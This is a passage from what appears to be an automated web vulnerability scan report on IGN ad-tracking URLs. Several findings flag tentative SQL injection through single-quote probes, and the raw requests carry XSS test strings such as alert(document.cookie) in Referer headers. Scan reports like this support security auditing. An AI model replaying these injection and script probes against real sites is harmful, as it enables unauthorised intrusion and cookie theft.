Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=409,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11691,11717,11754,14845,15232,16249,16251,17919,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bvtAjns,bguRqRgbdmoWx HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:14 GMT
Connection: close
Vary: Accept-Encoding


1.40. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bezcjaa,bguRrblewbsur [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bezcjaa,bguRrblewbsur

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bezcjaa,bguRrblewbsur HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:43:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bezcjaa,bguRrblewbsur HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:43:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:43:53 GMT
Connection: close
Vary: Accept-Encoding


1.41. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=crblguo,bguRqRgbdmoWm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=crblguo,bguRqRgbdmoWm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=crblguo,bguRqRgbdmoWm HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=77682&FlightID=71656&TargetID=14594&EntityDefResetFlag=0&C=0&Segments=7,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23425,23427,23429,23472,23479,23480,23493&Targets=28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=crblguo,bguRqRgbdmoWm HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:10 GMT
Connection: close
Vary: Accept-Encoding


1.42. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ccetvte,bguRrfrbdmWaa [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ccetvte,bguRrfrbdmWaa

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ccetvte,bguRrfrbdmWaa HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.2.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=ccetvte,bguRrfrbdmWaa HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.2.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:35 GMT
Connection: close
Vary: Accept-Encoding


1.43. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=beykRvw,bguRragewbmAj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=beykRvw,bguRragewbmAj

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=8927&FlightID=7790&TargetID=6669&EntityDefResetFlag=0&C=0&Segments=7,26,349,2747,3493,3976,3984,4172,4602,4603,4723,4917,4929,5718,5749,5906,6102,6382,6573,6652,6673,6990,7102,7396,7752,7888,9598,11754,11908,14845,15232,16249,16251,17904,22099,22154,22854,23370,23425,23427,23472,23479,23480,23493&Targets=6846,28681,6820,6905,6669,14594&Values=25,31,43,60,72,80,91,101,110,150,152,235,248,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=beykRvw,bguRragewbmAj HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

